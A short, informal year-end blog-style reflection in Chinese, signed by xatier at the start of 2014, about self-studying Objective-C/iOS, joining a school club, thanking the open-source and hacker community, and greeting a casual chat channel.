也是自己第一次自學 Obj-C iOS programming





今年加入了學校的 OH


今年算是 hacking 碰的比較少的一年吧
感謝噗友、開源社群的夥伴以及各位 hacker

happy hacking!

for each in NC7U-WTF channel
NC7U-WTF !!! 24x7 歡樂聊天、惡搞、婊人、髒髒物分享   糾團休學啦!幹!


xatier 20140101